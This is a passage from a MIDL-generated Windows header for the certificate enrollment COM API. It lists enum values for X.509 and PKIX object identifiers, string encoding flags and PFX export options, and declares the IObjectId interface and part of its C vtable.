        XCN_OID_OIWSEC	= 65,
        XCN_OID_OIWSEC_md4RSA	= 66,
        XCN_OID_OIWSEC_md5RSA	= 67,
        XCN_OID_OIWSEC_md4RSA2	= 68,
        XCN_OID_OIWSEC_desECB	= 69,
        XCN_OID_OIWSEC_desCBC	= 70,
        XCN_OID_OIWSEC_desOFB	= 71,
        XCN_OID_OIWSEC_desCFB	= 72,
        XCN_OID_OIWSEC_desMAC	= 73,
        XCN_OID_OIWSEC_rsaSign	= 74,
        XCN_OID_OIWSEC_dsa	= 75,
        XCN_OID_OIWSEC_shaDSA	= 76,
        XCN_OID_OIWSEC_mdc2RSA	= 77,
        XCN_OID_OIWSEC_shaRSA	= 78,
        XCN_OID_OIWSEC_dhCommMod	= 79,
        XCN_OID_OIWSEC_desEDE	= 80,
        XCN_OID_OIWSEC_sha	= 81,
        XCN_OID_OIWSEC_mdc2	= 82,
        XCN_OID_OIWSEC_dsaComm	= 83,
        XCN_OID_OIWSEC_dsaCommSHA	= 84,
        XCN_OID_OIWSEC_rsaXchg	= 85,
        XCN_OID_OIWSEC_keyHashSeal	= 86,
        XCN_OID_OIWSEC_md2RSASign	= 87,
        XCN_OID_OIWSEC_md5RSASign	= 88,
        XCN_OID_OIWSEC_sha1	= 89,
        XCN_OID_OIWSEC_dsaSHA1	= 90,
        XCN_OID_OIWSEC_dsaCommSHA1	= 91,
        XCN_OID_OIWSEC_sha1RSASign	= 92,
        XCN_OID_OIWDIR	= 93,
        XCN_OID_OIWDIR_CRPT	= 94,
        XCN_OID_OIWDIR_HASH	= 95,
        XCN_OID_OIWDIR_SIGN	= 96,
        XCN_OID_OIWDIR_md2	= 97,
        XCN_OID_OIWDIR_md2RSA	= 98,
        XCN_OID_INFOSEC	= 99,
        XCN_OID_INFOSEC_sdnsSignature	= 100,
        XCN_OID_INFOSEC_mosaicSignature	= 101,
        XCN_OID_INFOSEC_sdnsConfidentiality	= 102,
        XCN_OID_INFOSEC_mosaicConfidentiality	= 103,
        XCN_OID_INFOSEC_sdnsIntegrity	= 104,
        XCN_OID_INFOSEC_mosaicIntegrity	= 105,
        XCN_OID_INFOSEC_sdnsTokenProtection	= 106,
        XCN_OID_INFOSEC_mosaicTokenProtection	= 107,
        XCN_OID_INFOSEC_sdnsKeyManagement	= 108,
        XCN_OID_INFOSEC_mosaicKeyManagement	= 109,
        XCN_OID_INFOSEC_sdnsKMandSig	= 110,
        XCN_OID_INFOSEC_mosaicKMandSig	= 111,
        XCN_OID_INFOSEC_SuiteASignature	= 112,
        XCN_OID_INFOSEC_SuiteAConfidentiality	= 113,
        XCN_OID_INFOSEC_SuiteAIntegrity	= 114,
        XCN_OID_INFOSEC_SuiteATokenProtection	= 115,
        XCN_OID_INFOSEC_SuiteAKeyManagement	= 116,
        XCN_OID_INFOSEC_SuiteAKMandSig	= 117,
        XCN_OID_INFOSEC_mosaicUpdatedSig	= 118,
        XCN_OID_INFOSEC_mosaicKMandUpdSig	= 119,
        XCN_OID_INFOSEC_mosaicUpdatedInteg	= 120,
        XCN_OID_COMMON_NAME	= 121,
        XCN_OID_SUR_NAME	= 122,
        XCN_OID_DEVICE_SERIAL_NUMBER	= 123,
        XCN_OID_COUNTRY_NAME	= 124,
        XCN_OID_LOCALITY_NAME	= 125,
        XCN_OID_STATE_OR_PROVINCE_NAME	= 126,
        XCN_OID_STREET_ADDRESS	= 127,
        XCN_OID_ORGANIZATION_NAME	= 128,
        XCN_OID_ORGANIZATIONAL_UNIT_NAME	= 129,
        XCN_OID_TITLE	= 130,
        XCN_OID_DESCRIPTION	= 131,
        XCN_OID_SEARCH_GUIDE	= 132,
        XCN_OID_BUSINESS_CATEGORY	= 133,
        XCN_OID_POSTAL_ADDRESS	= 134,
        XCN_OID_POSTAL_CODE	= 135,
        XCN_OID_POST_OFFICE_BOX	= 136,
        XCN_OID_PHYSICAL_DELIVERY_OFFICE_NAME	= 137,
        XCN_OID_TELEPHONE_NUMBER	= 138,
        XCN_OID_TELEX_NUMBER	= 139,
        XCN_OID_TELETEXT_TERMINAL_IDENTIFIER	= 140,
        XCN_OID_FACSIMILE_TELEPHONE_NUMBER	= 141,
        XCN_OID_X21_ADDRESS	= 142,
        XCN_OID_INTERNATIONAL_ISDN_NUMBER	= 143,
        XCN_OID_REGISTERED_ADDRESS	= 144,
        XCN_OID_DESTINATION_INDICATOR	= 145,
        XCN_OID_PREFERRED_DELIVERY_METHOD	= 146,
        XCN_OID_PRESENTATION_ADDRESS	= 147,
        XCN_OID_SUPPORTED_APPLICATION_CONTEXT	= 148,
        XCN_OID_MEMBER	= 149,
        XCN_OID_OWNER	= 150,
        XCN_OID_ROLE_OCCUPANT	= 151,
        XCN_OID_SEE_ALSO	= 152,
        XCN_OID_USER_PASSWORD	= 153,
        XCN_OID_USER_CERTIFICATE	= 154,
        XCN_OID_CA_CERTIFICATE	= 155,
        XCN_OID_AUTHORITY_REVOCATION_LIST	= 156,
        XCN_OID_CERTIFICATE_REVOCATION_LIST	= 157,
        XCN_OID_CROSS_CERTIFICATE_PAIR	= 158,
        XCN_OID_GIVEN_NAME	= 159,
        XCN_OID_INITIALS	= 160,
        XCN_OID_DN_QUALIFIER	= 161,
        XCN_OID_DOMAIN_COMPONENT	= 162,
        XCN_OID_PKCS_12_FRIENDLY_NAME_ATTR	= 163,
        XCN_OID_PKCS_12_LOCAL_KEY_ID	= 164,
        XCN_OID_PKCS_12_KEY_PROVIDER_NAME_ATTR	= 165,
        XCN_OID_LOCAL_MACHINE_KEYSET	= 166,
        XCN_OID_PKCS_12_EXTENDED_ATTRIBUTES	= 167,
        XCN_OID_KEYID_RDN	= 168,
        XCN_OID_AUTHORITY_KEY_IDENTIFIER	= 169,
        XCN_OID_KEY_ATTRIBUTES	= 170,
        XCN_OID_CERT_POLICIES_95	= 171,
        XCN_OID_KEY_USAGE_RESTRICTION	= 172,
        XCN_OID_SUBJECT_ALT_NAME	= 173,
        XCN_OID_ISSUER_ALT_NAME	= 174,
        XCN_OID_BASIC_CONSTRAINTS	= 175,
        XCN_OID_KEY_USAGE	= 176,
        XCN_OID_PRIVATEKEY_USAGE_PERIOD	= 177,
        XCN_OID_BASIC_CONSTRAINTS2	= 178,
        XCN_OID_CERT_POLICIES	= 179,
        XCN_OID_ANY_CERT_POLICY	= 180,
        XCN_OID_AUTHORITY_KEY_IDENTIFIER2	= 181,
        XCN_OID_SUBJECT_KEY_IDENTIFIER	= 182,
        XCN_OID_SUBJECT_ALT_NAME2	= 183,
        XCN_OID_ISSUER_ALT_NAME2	= 184,
        XCN_OID_CRL_REASON_CODE	= 185,
        XCN_OID_REASON_CODE_HOLD	= 186,
        XCN_OID_CRL_DIST_POINTS	= 187,
        XCN_OID_ENHANCED_KEY_USAGE	= 188,
        XCN_OID_CRL_NUMBER	= 189,
        XCN_OID_DELTA_CRL_INDICATOR	= 190,
        XCN_OID_ISSUING_DIST_POINT	= 191,
        XCN_OID_FRESHEST_CRL	= 192,
        XCN_OID_NAME_CONSTRAINTS	= 193,
        XCN_OID_POLICY_MAPPINGS	= 194,
        XCN_OID_LEGACY_POLICY_MAPPINGS	= 195,
        XCN_OID_POLICY_CONSTRAINTS	= 196,
        XCN_OID_RENEWAL_CERTIFICATE	= 197,
        XCN_OID_ENROLLMENT_NAME_VALUE_PAIR	= 198,
        XCN_OID_ENROLLMENT_CSP_PROVIDER	= 199,
        XCN_OID_OS_VERSION	= 200,
        XCN_OID_ENROLLMENT_AGENT	= 201,
        XCN_OID_PKIX	= 202,
        XCN_OID_PKIX_PE	= 203,
        XCN_OID_AUTHORITY_INFO_ACCESS	= 204,
        XCN_OID_BIOMETRIC_EXT	= 205,
        XCN_OID_LOGOTYPE_EXT	= 206,
        XCN_OID_CERT_EXTENSIONS	= 207,
        XCN_OID_NEXT_UPDATE_LOCATION	= 208,
        XCN_OID_REMOVE_CERTIFICATE	= 209,
        XCN_OID_CROSS_CERT_DIST_POINTS	= 210,
        XCN_OID_CTL	= 211,
        XCN_OID_SORTED_CTL	= 212,
        XCN_OID_SERIALIZED	= 213,
        XCN_OID_NT_PRINCIPAL_NAME	= 214,
        XCN_OID_PRODUCT_UPDATE	= 215,
        XCN_OID_ANY_APPLICATION_POLICY	= 216,
        XCN_OID_AUTO_ENROLL_CTL_USAGE	= 217,
        XCN_OID_ENROLL_CERTTYPE_EXTENSION	= 218,
        XCN_OID_CERT_MANIFOLD	= 219,
        XCN_OID_CERTSRV_CA_VERSION	= 220,
        XCN_OID_CERTSRV_PREVIOUS_CERT_HASH	= 221,
        XCN_OID_CRL_VIRTUAL_BASE	= 222,
        XCN_OID_CRL_NEXT_PUBLISH	= 223,
        XCN_OID_KP_CA_EXCHANGE	= 224,
        XCN_OID_KP_KEY_RECOVERY_AGENT	= 225,
        XCN_OID_CERTIFICATE_TEMPLATE	= 226,
        XCN_OID_ENTERPRISE_OID_ROOT	= 227,
        XCN_OID_RDN_DUMMY_SIGNER	= 228,
        XCN_OID_APPLICATION_CERT_POLICIES	= 229,
        XCN_OID_APPLICATION_POLICY_MAPPINGS	= 230,
        XCN_OID_APPLICATION_POLICY_CONSTRAINTS	= 231,
        XCN_OID_ARCHIVED_KEY_ATTR	= 232,
        XCN_OID_CRL_SELF_CDP	= 233,
        XCN_OID_REQUIRE_CERT_CHAIN_POLICY	= 234,
        XCN_OID_ARCHIVED_KEY_CERT_HASH	= 235,
        XCN_OID_ISSUED_CERT_HASH	= 236,
        XCN_OID_DS_EMAIL_REPLICATION	= 237,
        XCN_OID_REQUEST_CLIENT_INFO	= 238,
        XCN_OID_ENCRYPTED_KEY_HASH	= 239,
        XCN_OID_CERTSRV_CROSSCA_VERSION	= 240,
        XCN_OID_NTDS_REPLICATION	= 241,
        XCN_OID_SUBJECT_DIR_ATTRS	= 242,
        XCN_OID_PKIX_KP	= 243,
        XCN_OID_PKIX_KP_SERVER_AUTH	= 244,
        XCN_OID_PKIX_KP_CLIENT_AUTH	= 245,
        XCN_OID_PKIX_KP_CODE_SIGNING	= 246,
        XCN_OID_PKIX_KP_EMAIL_PROTECTION	= 247,
        XCN_OID_PKIX_KP_IPSEC_END_SYSTEM	= 248,
        XCN_OID_PKIX_KP_IPSEC_TUNNEL	= 249,
        XCN_OID_PKIX_KP_IPSEC_USER	= 250,
        XCN_OID_PKIX_KP_TIMESTAMP_SIGNING	= 251,
        XCN_OID_PKIX_KP_OCSP_SIGNING	= 252,
        XCN_OID_PKIX_OCSP_NOCHECK	= 253,
        XCN_OID_IPSEC_KP_IKE_INTERMEDIATE	= 254,
        XCN_OID_KP_CTL_USAGE_SIGNING	= 255,
        XCN_OID_KP_TIME_STAMP_SIGNING	= 256,
        XCN_OID_SERVER_GATED_CRYPTO	= 257,
        XCN_OID_SGC_NETSCAPE	= 258,
        XCN_OID_KP_EFS	= 259,
        XCN_OID_EFS_RECOVERY	= 260,
        XCN_OID_WHQL_CRYPTO	= 261,
        XCN_OID_NT5_CRYPTO	= 262,
        XCN_OID_OEM_WHQL_CRYPTO	= 263,
        XCN_OID_EMBEDDED_NT_CRYPTO	= 264,
        XCN_OID_ROOT_LIST_SIGNER	= 265,
        XCN_OID_KP_QUALIFIED_SUBORDINATION	= 266,
        XCN_OID_KP_KEY_RECOVERY	= 267,
        XCN_OID_KP_DOCUMENT_SIGNING	= 268,
        XCN_OID_KP_LIFETIME_SIGNING	= 269,
        XCN_OID_KP_MOBILE_DEVICE_SOFTWARE	= 270,
        XCN_OID_KP_SMART_DISPLAY	= 271,
        XCN_OID_KP_CSP_SIGNATURE	= 272,
        XCN_OID_DRM	= 273,
        XCN_OID_DRM_INDIVIDUALIZATION	= 274,
        XCN_OID_LICENSES	= 275,
        XCN_OID_LICENSE_SERVER	= 276,
        XCN_OID_KP_SMARTCARD_LOGON	= 277,
        XCN_OID_YESNO_TRUST_ATTR	= 278,
        XCN_OID_PKIX_POLICY_QUALIFIER_CPS	= 279,
        XCN_OID_PKIX_POLICY_QUALIFIER_USERNOTICE	= 280,
        XCN_OID_CERT_POLICIES_95_QUALIFIER1	= 281,
        XCN_OID_PKIX_ACC_DESCR	= 282,
        XCN_OID_PKIX_OCSP	= 283,
        XCN_OID_PKIX_CA_ISSUERS	= 284,
        XCN_OID_VERISIGN_PRIVATE_6_9	= 285,
        XCN_OID_VERISIGN_ONSITE_JURISDICTION_HASH	= 286,
        XCN_OID_VERISIGN_BITSTRING_6_13	= 287,
        XCN_OID_VERISIGN_ISS_STRONG_CRYPTO	= 288,
        XCN_OID_NETSCAPE	= 289,
        XCN_OID_NETSCAPE_CERT_EXTENSION	= 290,
        XCN_OID_NETSCAPE_CERT_TYPE	= 291,
        XCN_OID_NETSCAPE_BASE_URL	= 292,
        XCN_OID_NETSCAPE_REVOCATION_URL	= 293,
        XCN_OID_NETSCAPE_CA_REVOCATION_URL	= 294,
        XCN_OID_NETSCAPE_CERT_RENEWAL_URL	= 295,
        XCN_OID_NETSCAPE_CA_POLICY_URL	= 296,
        XCN_OID_NETSCAPE_SSL_SERVER_NAME	= 297,
        XCN_OID_NETSCAPE_COMMENT	= 298,
        XCN_OID_NETSCAPE_DATA_TYPE	= 299,
        XCN_OID_NETSCAPE_CERT_SEQUENCE	= 300,
        XCN_OID_CT_PKI_DATA	= 301,
        XCN_OID_CT_PKI_RESPONSE	= 302,
        XCN_OID_PKIX_NO_SIGNATURE	= 303,
        XCN_OID_CMC	= 304,
        XCN_OID_CMC_STATUS_INFO	= 305,
        XCN_OID_CMC_IDENTIFICATION	= 306,
        XCN_OID_CMC_IDENTITY_PROOF	= 307,
        XCN_OID_CMC_DATA_RETURN	= 308,
        XCN_OID_CMC_TRANSACTION_ID	= 309,
        XCN_OID_CMC_SENDER_NONCE	= 310,
        XCN_OID_CMC_RECIPIENT_NONCE	= 311,
        XCN_OID_CMC_ADD_EXTENSIONS	= 312,
        XCN_OID_CMC_ENCRYPTED_POP	= 313,
        XCN_OID_CMC_DECRYPTED_POP	= 314,
        XCN_OID_CMC_LRA_POP_WITNESS	= 315,
        XCN_OID_CMC_GET_CERT	= 316,
        XCN_OID_CMC_GET_CRL	= 317,
        XCN_OID_CMC_REVOKE_REQUEST	= 318,
        XCN_OID_CMC_REG_INFO	= 319,
        XCN_OID_CMC_RESPONSE_INFO	= 320,
        XCN_OID_CMC_QUERY_PENDING	= 321,
        XCN_OID_CMC_ID_POP_LINK_RANDOM	= 322,
        XCN_OID_CMC_ID_POP_LINK_WITNESS	= 323,
        XCN_OID_CMC_ID_CONFIRM_CERT_ACCEPTANCE	= 324,
        XCN_OID_CMC_ADD_ATTRIBUTES	= 325,
        XCN_OID_LOYALTY_OTHER_LOGOTYPE	= 326,
        XCN_OID_BACKGROUND_OTHER_LOGOTYPE	= 327,
        XCN_OID_PKIX_OCSP_BASIC_SIGNED_RESPONSE	= 328,
        XCN_OID_PKCS_7_DATA	= 329,
        XCN_OID_PKCS_7_SIGNED	= 330,
        XCN_OID_PKCS_7_ENVELOPED	= 331,
        XCN_OID_PKCS_7_SIGNEDANDENVELOPED	= 332,
        XCN_OID_PKCS_7_DIGESTED	= 333,
        XCN_OID_PKCS_7_ENCRYPTED	= 334,
        XCN_OID_PKCS_9_CONTENT_TYPE	= 335,
        XCN_OID_PKCS_9_MESSAGE_DIGEST	= 336,
        XCN_OID_CERT_PROP_ID_PREFIX	= 337,
        XCN_OID_CERT_KEY_IDENTIFIER_PROP_ID	= 338,
        XCN_OID_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 339,
        XCN_OID_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 340,
        XCN_OID_CERT_MD5_HASH_PROP_ID	= 341,
        XCN_OID_RSA_SHA256RSA	= 342,
        XCN_OID_RSA_SHA384RSA	= 343,
        XCN_OID_RSA_SHA512RSA	= 344,
        XCN_OID_NIST_sha256	= 345,
        XCN_OID_NIST_sha384	= 346,
        XCN_OID_NIST_sha512	= 347,
        XCN_OID_RSA_MGF1	= 348,
        XCN_OID_ECC_PUBLIC_KEY	= 349,
        XCN_OID_ECDSA_SHA1	= 350,
        XCN_OID_ECDSA_SPECIFIED	= 351,
        XCN_OID_ANY_ENHANCED_KEY_USAGE	= 352,
        XCN_OID_RSA_SSA_PSS	= 353,
        XCN_OID_ATTR_SUPPORTED_ALGORITHMS	= 355,
        XCN_OID_ATTR_TPM_SECURITY_ASSERTIONS	= 356,
        XCN_OID_ATTR_TPM_SPECIFICATION	= 357,
        XCN_OID_CERT_DISALLOWED_FILETIME_PROP_ID	= 358,
        XCN_OID_CERT_SIGNATURE_HASH_PROP_ID	= 359,
        XCN_OID_CERT_STRONG_KEY_OS_1	= 360,
        XCN_OID_CERT_STRONG_KEY_OS_CURRENT	= 361,
        XCN_OID_CERT_STRONG_KEY_OS_PREFIX	= 362,
        XCN_OID_CERT_STRONG_SIGN_OS_1	= 363,
        XCN_OID_CERT_STRONG_SIGN_OS_CURRENT	= 364,
        XCN_OID_CERT_STRONG_SIGN_OS_PREFIX	= 365,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA1_KDF	= 366,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA256_KDF	= 367,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA384_KDF	= 368,
        XCN_OID_DISALLOWED_HASH	= 369,
        XCN_OID_DISALLOWED_LIST	= 370,
        XCN_OID_ECC_CURVE_P256	= 371,
        XCN_OID_ECC_CURVE_P384	= 372,
        XCN_OID_ECC_CURVE_P521	= 373,
        XCN_OID_ECDSA_SHA256	= 374,
        XCN_OID_ECDSA_SHA384	= 375,
        XCN_OID_ECDSA_SHA512	= 376,
        XCN_OID_ENROLL_CAXCHGCERT_HASH	= 377,
        XCN_OID_ENROLL_EK_INFO	= 378,
        XCN_OID_ENROLL_EKPUB_CHALLENGE	= 379,
        XCN_OID_ENROLL_EKVERIFYCERT	= 380,
        XCN_OID_ENROLL_EKVERIFYCREDS	= 381,
        XCN_OID_ENROLL_EKVERIFYKEY	= 382,
        XCN_OID_EV_RDN_COUNTRY	= 383,
        XCN_OID_EV_RDN_LOCALE	= 384,
        XCN_OID_EV_RDN_STATE_OR_PROVINCE	= 385,
        XCN_OID_INHIBIT_ANY_POLICY	= 386,
        XCN_OID_INTERNATIONALIZED_EMAIL_ADDRESS	= 387,
        XCN_OID_KP_KERNEL_MODE_CODE_SIGNING	= 388,
        XCN_OID_KP_KERNEL_MODE_HAL_EXTENSION_SIGNING	= 389,
        XCN_OID_KP_KERNEL_MODE_TRUSTED_BOOT_SIGNING	= 390,
        XCN_OID_KP_TPM_AIK_CERTIFICATE	= 391,
        XCN_OID_KP_TPM_EK_CERTIFICATE	= 392,
        XCN_OID_KP_TPM_PLATFORM_CERTIFICATE	= 393,
        XCN_OID_NIST_AES128_CBC	= 394,
        XCN_OID_NIST_AES128_WRAP	= 395,
        XCN_OID_NIST_AES192_CBC	= 396,
        XCN_OID_NIST_AES192_WRAP	= 397,
        XCN_OID_NIST_AES256_CBC	= 398,
        XCN_OID_NIST_AES256_WRAP	= 399,
        XCN_OID_PKCS_12_PbeIds	= 400,
        XCN_OID_PKCS_12_pbeWithSHA1And128BitRC2	= 401,
        XCN_OID_PKCS_12_pbeWithSHA1And128BitRC4	= 402,
        XCN_OID_PKCS_12_pbeWithSHA1And2KeyTripleDES	= 403,
        XCN_OID_PKCS_12_pbeWithSHA1And3KeyTripleDES	= 404,
        XCN_OID_PKCS_12_pbeWithSHA1And40BitRC2	= 405,
        XCN_OID_PKCS_12_pbeWithSHA1And40BitRC4	= 406,
        XCN_OID_PKCS_12_PROTECTED_PASSWORD_SECRET_BAG_TYPE_ID	= 407,
        XCN_OID_PKINIT_KP_KDC	= 408,
        XCN_OID_PKIX_CA_REPOSITORY	= 409,
        XCN_OID_PKIX_OCSP_NONCE	= 410,
        XCN_OID_PKIX_TIME_STAMPING	= 411,
        XCN_OID_QC_EU_COMPLIANCE	= 412,
        XCN_OID_QC_SSCD	= 413,
        XCN_OID_QC_STATEMENTS_EXT	= 414,
        XCN_OID_RDN_TPM_MANUFACTURER	= 415,
        XCN_OID_RDN_TPM_MODEL	= 416,
        XCN_OID_RDN_TPM_VERSION	= 417,
        XCN_OID_REVOKED_LIST_SIGNER	= 418,
        XCN_OID_RFC3161_counterSign	= 419,
        XCN_OID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION	= 420,
        XCN_OID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION	= 421,
        XCN_OID_ROOT_PROGRAM_FLAGS	= 422,
        XCN_OID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL	= 423,
        XCN_OID_RSA_PSPECIFIED	= 424,
        XCN_OID_RSAES_OAEP	= 425,
        XCN_OID_SUBJECT_INFO_ACCESS	= 426,
        XCN_OID_TIMESTAMP_TOKEN	= 427,
        XCN_OID_ENROLL_SCEP_ERROR	= 428,
        XCN_OIDVerisign_MessageType	= 429,
        XCN_OIDVerisign_PkiStatus	= 430,
        XCN_OIDVerisign_FailInfo	= 431,
        XCN_OIDVerisign_SenderNonce	= 432,
        XCN_OIDVerisign_RecipientNonce	= 433,
        XCN_OIDVerisign_TransactionID	= 434,
        XCN_OID_ENROLL_ATTESTATION_CHALLENGE	= 435,
        XCN_OID_ENROLL_ATTESTATION_STATEMENT	= 436,
        XCN_OID_ENROLL_ENCRYPTION_ALGORITHM	= 437,
        XCN_OID_ENROLL_KSP_NAME	= 438
    } 	CERTENROLL_OBJECTID;

typedef 
enum WebSecurityLevel
    {
        LevelUnsafe	= 0,
        LevelSafe	= 1
    } 	WebSecurityLevel;

#define	CERTENROLL_INDEX_BASE	( 0 )

typedef 
enum EncodingType
    {
        XCN_CRYPT_STRING_BASE64HEADER	= 0,
        XCN_CRYPT_STRING_BASE64	= 0x1,
        XCN_CRYPT_STRING_BINARY	= 0x2,
        XCN_CRYPT_STRING_BASE64REQUESTHEADER	= 0x3,
        XCN_CRYPT_STRING_HEX	= 0x4,
        XCN_CRYPT_STRING_HEXASCII	= 0x5,
        XCN_CRYPT_STRING_BASE64_ANY	= 0x6,
        XCN_CRYPT_STRING_ANY	= 0x7,
        XCN_CRYPT_STRING_HEX_ANY	= 0x8,
        XCN_CRYPT_STRING_BASE64X509CRLHEADER	= 0x9,
        XCN_CRYPT_STRING_HEXADDR	= 0xa,
        XCN_CRYPT_STRING_HEXASCIIADDR	= 0xb,
        XCN_CRYPT_STRING_HEXRAW	= 0xc,
        XCN_CRYPT_STRING_BASE64URI	= 0xd,
        XCN_CRYPT_STRING_ENCODEMASK	= 0xff,
        XCN_CRYPT_STRING_CHAIN	= 0x100,
        XCN_CRYPT_STRING_TEXT	= 0x200,
        XCN_CRYPT_STRING_PERCENTESCAPE	= 0x8000000,
        XCN_CRYPT_STRING_HASHDATA	= 0x10000000,
        XCN_CRYPT_STRING_STRICT	= 0x20000000,
        XCN_CRYPT_STRING_NOCRLF	= 0x40000000,
        XCN_CRYPT_STRING_NOCR	= 0x80000000
    } 	EncodingType;

typedef 
enum PFXExportOptions
    {
        PFXExportEEOnly	= 0,
        PFXExportChainNoRoot	= 1,
        PFXExportChainWithRoot	= 2
    } 	PFXExportOptions;

typedef 
enum ObjectIdGroupId
    {
        XCN_CRYPT_ANY_GROUP_ID	= 0,
        XCN_CRYPT_HASH_ALG_OID_GROUP_ID	= 1,
        XCN_CRYPT_ENCRYPT_ALG_OID_GROUP_ID	= 2,
        XCN_CRYPT_PUBKEY_ALG_OID_GROUP_ID	= 3,
        XCN_CRYPT_SIGN_ALG_OID_GROUP_ID	= 4,
        XCN_CRYPT_RDN_ATTR_OID_GROUP_ID	= 5,
        XCN_CRYPT_EXT_OR_ATTR_OID_GROUP_ID	= 6,
        XCN_CRYPT_ENHKEY_USAGE_OID_GROUP_ID	= 7,
        XCN_CRYPT_POLICY_OID_GROUP_ID	= 8,
        XCN_CRYPT_TEMPLATE_OID_GROUP_ID	= 9,
        XCN_CRYPT_LAST_OID_GROUP_ID	= 10,
        XCN_CRYPT_FIRST_ALG_OID_GROUP_ID	= 1,
        XCN_CRYPT_LAST_ALG_OID_GROUP_ID	= 4,
        XCN_CRYPT_GROUP_ID_MASK	= 0xffff,
        XCN_CRYPT_OID_PREFER_CNG_ALGID_FLAG	= 0x40000000,
        XCN_CRYPT_OID_DISABLE_SEARCH_DS_FLAG	= 0x80000000,
        XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_MASK	= 0xfff0000,
        XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_SHIFT	= 16,
        XCN_CRYPT_KEY_LENGTH_MASK	= 0xfff0000
    } 	ObjectIdGroupId;

typedef 
enum ObjectIdPublicKeyFlags
    {
        XCN_CRYPT_OID_INFO_PUBKEY_ANY	= 0,
        XCN_CRYPT_OID_INFO_PUBKEY_SIGN_KEY_FLAG	= 0x80000000,
        XCN_CRYPT_OID_INFO_PUBKEY_ENCRYPT_KEY_FLAG	= 0x40000000
    } 	ObjectIdPublicKeyFlags;

typedef 
enum AlgorithmFlags
    {
        AlgorithmFlagsNone	= 0,
        AlgorithmFlagsWrap	= 0x1
    } 	AlgorithmFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_s_ifspec;

#ifndef __IObjectId_INTERFACE_DEFINED__
#define __IObjectId_INTERFACE_DEFINED__

/* interface IObjectId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab300-217d-11da-b2a4-000e7bbb2b09")
    IObjectId : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ CERTENROLL_OBJECTID Name) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromValue( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IObjectIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectId * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in IObjectId * This,
            /* [in] */ CERTENROLL_OBJECTID Name);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromValue )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
